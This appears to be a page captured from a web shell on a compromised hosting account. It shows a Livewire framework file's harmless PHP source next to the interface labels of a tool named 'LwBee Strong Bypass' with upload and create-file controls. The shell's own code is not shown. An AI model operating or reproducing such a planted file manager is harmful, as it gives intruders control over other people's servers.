/home/storage/f/3f/a5/aloic1/public_html/core/vendor/livewire/livewire/src/Features/Placeholder.php
<?php
namespace Livewire\Features;
use Livewire\Livewire;
class Placeholder
{
static function init() { return new static; }
function __construct()
{
Livewire::listen('component.hydrate', function ($component, $request) {
//
});
Livewire::listen('component.dehydrate', function ($component, $response) {
//
});
Livewire::listen('flush-state', function() {
//
});
}
}
@LwBee Strong Bypass
Upload File
Create New File